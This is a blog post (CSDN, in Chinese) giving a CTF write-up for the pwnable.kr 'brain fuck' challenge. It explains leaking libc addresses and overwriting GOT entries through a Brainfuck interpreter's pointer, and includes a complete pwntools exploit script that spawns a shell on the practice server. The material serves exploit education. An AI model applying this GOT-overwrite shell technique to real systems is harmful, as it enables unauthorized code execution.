pwnable 笔记 Rookiss - brain fuck - 150 pt

最新推荐文章于 2024-04-08 20:49:54 发布
最新推荐文章于 2024-04-08 20:49:54 发布
阅读量3k 收藏 1
点赞数
分类专栏: pwn 知识总结 pwnable.kr 题解 文章标签: pwn GOT覆写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SmalOSnail/article/details/53679546
版权
pwn 同时被 3 个专栏收录
35 篇文章 2 订阅
订阅专栏
pwnable.kr 题解
20 篇文章 18 订阅
订阅专栏
知识总结
14 篇文章 0 订阅
订阅专栏

题目分析

根据题目提示,程序是一个BrainF**k的解释器,用IDA Pro静态分析程序,程序结构很简单,如下图:
struct

main函数

IDA1
IDA2

do_brainfuck函数

fck
如上图,在do_brainfuck中可以看到程序一共支持brainf**k的6种操作>,<,+,-,.,,,具体含义如下表:

操作含义
>p += 1
<p -= 1
+(*p) += 1
-(*p) -= 1
.putchar(*p)
,getchar(p)

注:p是指向堆空间的一个指针

指针p存在bss段,如下图:
heap

既然这个指针在堆中,那么它距离got表很近,而上述的操作中正好有移动指针的操作,利用>,<前后移动指针就可以到达内存中任意区域,再利用.,,操作就可以实现对内存的读取与改写。

具体分析后发现指针p指向的区域距离GOT表中最后一个函数putchar只有112字节,我们很容易实现对GOT表的覆写。

所以这道题目主要考察GOT覆写技术

解题思路

因为最终的目的是要拿到一个shell,所以要想办法构造并执行system("/bin/sh\0")

system函数可以通过泄露内存得到,而"/bin/sh"只能从标准输入中得到

程序中有一个fgets函数,但是fgets到的字符串用于在do_brainfuck中覆写GOT表了,所以只能想别的办法找其他可以利用的函数:
func

这里挑选memsetfgets两个函数作为覆写对象正合适,原因如下:

  • puts函数不好控制参数,第一个参数为固定的字符串

  • memset的第一个参数正好可以存放我们输入的字符串"/bin/sh"

call

  • fgets紧随memset,并且第一个参数与memset相同

所以解题的大致思路为:

  • 将menset覆写为gets,从stdin中读入"/bin/sh\0"

  • 将fgets覆写为system,执行system("/bin/sh\0")获取shell

解题过程

  • 泄露putchar函数真实地址

  • 根据题目给的libc计算其他函数真实地址

  • 覆写GOT表中putchar函数为main函数地址

  • 覆写GOT表中fgets函数为system函数地址

  • 覆写GOT表中memset函数为gets函数地址

  • 返回main函数,getshell

Talk is cheap, show me your code. ~ Linus

具体的解题过程直接看代码吧

解题脚本

#!/usr/bin/python
__author__ = "TaQini"
from pwn import *

# context.log_level = 'debug'
# p = process('bf')
# libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('bf_libc.so')
p = remote('pwnable.kr',9001)

def back(n):
    return '<'*n
def read(n):
    return '.>'*n
def write(n):
    return ',>'*n

putchar_got = 0x0804A030
memset_got  = 0x0804A02C
fgets_got   = 0x0804A010
ptr         = 0x0804A0A0

# leak putchar_addr
payload =  back(ptr - putchar_got) + '.' + read(4) 
# overwrite putchar_got to main_addr
payload += back(4) + write(4) 
# overwrite memset_got to gets_addr
payload += back(putchar_got - memset_got + 4) + write(4) 
# overwrite fgets_got to system_addr
payload += back(memset_got - fgets_got + 4) + write(4) 
# JUMP to main
payload += '.'

p.recvuntil('[ ]\n')
#gdb.attach(p)
p.sendline(payload)
p.recv(1) # junkcode

putchar_libc = libc.symbols['putchar']
gets_libc    = libc.symbols['gets']
system_libc  = libc.symbols['system']

putchar = u32(p.recv(4))
log.success("putchar = "+ hex(putchar))

gets    = putchar - putchar_libc + gets_libc
log.success("gets = "   + hex(gets))

system  = putchar - putchar_libc + system_libc
log.success("system = " + hex(system))

main    = 0x08048671
log.success("main = "   + hex(system))

p.send(p32(main))
p.send(p32(gets))
p.send(p32(system))

p.sendline('//bin/sh\0')
p.interactive()

More

这题的关键在于选择合适的函数去覆写,先从大局出发,确定方向,不过细节也很重要,gdb attach 在调试exp过程中起到了很大的作用,还有pwntools的context.log_level = 'debug'功能。

ok

恩..调试时的耐心也很重要… never give up

TaQini852
关注
专栏目录
BrainStorm:一个简单但有用的Brainfuck IDE,具有易于使用的终端运行程序
02-14
脑风暴 一个简单但有用的BrainFuck IDE!
pwnable brain fuck(bss段的用途)
九层台
09-26 649
题目链接传送门 这里题目跟网鼎杯线下赛的一个pwn有些相似。 输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。 首先要知道bss段里面有什么。 在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。 #coding=utf-8 from pwn import * p=0x0804a0a0 putcha...
Brainfuck语言入门
nameofcsdn的博客
11-29 2万+
Brainfuck语言是一种很图灵机的图灵机。 这个编程语言只有8种有效字符,其实就是8种指令: 字符 含义 > 指针加一 < 指针减一 + 指针指向的字节的值加一 - 指针指向的字节的值减一 . 输出指针指向的单元内容(ASCⅡ码)
烧脑语言Brainfuck及其加减乘除
个人笔记
09-09 2698
Brainfuck语言介绍,编译器代码,实现加减乘除。
某赛两杂项-CTF-brainfuck编码、modusbus协议分析
CTF小杂鱼的专栏
10-05 8517
一、某赛的brainfuck题目。 Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 题干: ,>>++ +++++ +++[< +++++ +++++ >-]<+ +[<-> -]<[+ -],>> +++++ +++++ [<+++ +++++ ++>-] <++++
org-brain:组织模式Wiki +概念图
02-04
用户可以通过org-brain创建、链接和探索各种想法、项目或笔记,类似于大脑中的神经元连接,形成一个有机的、相互关联的知识网络。 **标签解析:** 1. **emacs** - 表明org-brain是Emacs编辑器的一个扩展或插件,...
c++笔记9-引用.pdf
11-16
c++笔记9-引用.pdf
Cadence学习笔记1-原理图.pdf
11-16
Cadence学习笔记1-原理图.pdf
S7-200 Smart入门笔记1-8 程序合集
12-21
S7-200 Smart入门笔记1-8 程序合集 S7-200 Smart入门笔记1——流水灯 按钮 S7-200 Smart入门笔记1——流水灯 定时器 S7-200 Smart入门笔记2——读时钟 S7-200 Smart入门笔记3——呼吸灯 S7-200 Smart入门笔记4——...
Metaverse-Note 元宇宙笔记metaverse-note.zip
04-30
Metaverse-Note 元宇宙笔记metaverse-note.zip
brainfuck:Brainfuck解释器的多语言实现
05-28
脑干 Brainfuck解释器的多语言实现。 完全没有限制! 做你想干的事! 执行 C cpp 节点 PHP Brainfuck脚本 hello-world-1 hello-world-2 添加 乘 up 贡献 拉请求是受欢迎的:) 关于Brainfuck 以下内容来自维基百科。 检查以了解更多信息! Brainfuck是UrbanMüller于1993年创建的一种深奥的编程语言。 该语言以其极简主义而著称,仅由八个简单命令和一个指令指针组成。 虽然它完全是Turing完整的,但是它并不是供实际使用的,而是挑战和逗趣程序员的。 Brainfuck只需要将命令分解为微观步骤即可。 语言设计 该语言由以下列出的八个命令组成。 Brainfuck程序是这些命令的序列,可能还散布着其他字符(被忽略)。 这些命令按顺序执行,但有一些例外:指令指针从第一个命令开始,并且它指向的每个命令
Brainfuck:一个简单的 Brainfuck JS 解释器
07-23
脑残 一个简单的 Brainfuck JS 解释器 什么是脑筋急转弯? “Brainfuck 是一种以极简主义着称的深奥编程语言。该语言仅由八个简单的命令和一个指令指针组成。然而,它被证明是图灵完备的。它旨在挑战和娱乐程序员,而不是被制造出来适合实际使用。它由 Urban Müller 于 1993 年创建。该语言的名称是对粗俗术语“brain fuck”的引用,它指的是非常复杂或不寻常的事情,以至于超出了人们的理解范围”( )。 命令是什么? 脑残 C > ++ptr; < --ptr; + ++*ptr; - --*ptr; [ 而 (*ptr) { ] } . putchar(*ptr); , *ptr = getchar();
手动实现一门图灵完备的编程语言——Brainfuck_构建图灵完备语言
最新发布
2401_84187563的博客
04-08 1407
brainfuck 是 Urbak Muller 于1993年发明的语言,这门语言可以说是编程语言界的helloworld,它一个值有8个字符,每个有效字符就是一条命令,它就是一门图灵完备的编程语言,如果能理解他的工作原理,那么对于理解图灵机有很大的帮助。字符含义方法指针向右移一forward()指针向左移一backward()当前指针指向的数据带值+1increase()当前指针指向的数据带值-1reduce()将当前指针指向的数据带值的ASCII码打印print()
BrainFuck--只有八种指令、符合图灵完全思想的编程语言
weixin_30364147的博客
11-27 250
官方网站: http://www.muppetlabs.com/~breadbox/bf/ BrainFuck, (An Eight-Instruction Turing-Complete Programming Language), 这个语言本身的语言模型很简单, 有一个byte指针, 有一个初始化为0长度为30000 bytes的数组, byte指针可以在数组内任意移动, 支持下面的八种操...
手动实现一门图灵完备的编程语言——Brainfuck
麒思妙想
08-24 3754
>++++++++[<+++++++++++++>-]<.---.+++++++..+++.>++++++++[<---------->-]<+.>++++++++[<+++++++++++>-]<-.--------.+++.------.--------.>++++++[<----------->-]<-. 如果你看了上面这串字符,并知道它代表什么,那么相信你在你读完这篇文章后,你会理解...
brainfuck原理及C语言实现
z135733的博客
05-05 1392
因为brainfuck语言中操作数据数组的指令非常多,需要经常更改cur的指向,这些指令包括“I”(指针加1)、“D”(指针减1)等等。Brainfuck的源代码是由一系列的指令组成的,这些指令可以操作一个数组,也可以输出或输入数据。在BFState这个结构体中,array指向数据数组的首地址,cur表示当前指向的位置。根据读入的源代码,使用 switch-case 语句实现 Brainfuck 的 8 个指令,包括:+,-,>,
CTF——Crypto密码学题型总结
热门推荐
hahaha233330的博客
10-26 3万+
积累一下 CTF 中 crypto 密码类的题型。 感谢 BugKu 提供了很多加解密工具,链接:http://tool.bugku.com/ 感谢 SSL在线工具网址提供了很多工具,链接:http://www.ssleye.com/ 个人常用的 text bin hex base64 dec 转码工具:https://conv.darkbyte.ru/   1. 摩斯密码 特征:点和横的组合...
Python Brainfuck库:探秘奇妙的编程语言
涛哥聊Python
12-26 1036
通过本文,不仅学到了Brainfuck语言的基础知识,还了解了如何使用Python Brainfuck库在Python环境中执行Brainfuck代码。深入讨论了Brainfuck的语法、Python Brainfuck库的安装与基本用法,以及通过示例展示了高级特性和实际应用。Brainfuck语言虽然不是用于实际项目的首选语言,但它激发了程序员们对编程的好奇心和创造力。通过挑战性的编程练习,程序员们能够锻炼自己的思维方式,提升编程技能。
BrainFuck——C实现BrainFuck解释器
九日王朝
12-27 9638
首先介绍一下吊炸天的语言——BrainFuck Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF 这种语言基于一个简单的机器模型,除了指令,这个机器还包括:一个以字节为单位、被初始化为零的数组、一个指向该数组的指针(初始时指向数组的第一
MIT线性代数公开课笔记-行图像与列图像解析
“线性代数-笔记.pdf”是麻省理工学院教授Gilbert Strang的线性代数公开课笔记,涵盖了线性代数的基础知识,包括矩阵理论、方程组、向量空间、行列式、特征值、相似矩阵和正定矩阵等内容。 线性代数是数学的一个...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TaQini852

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值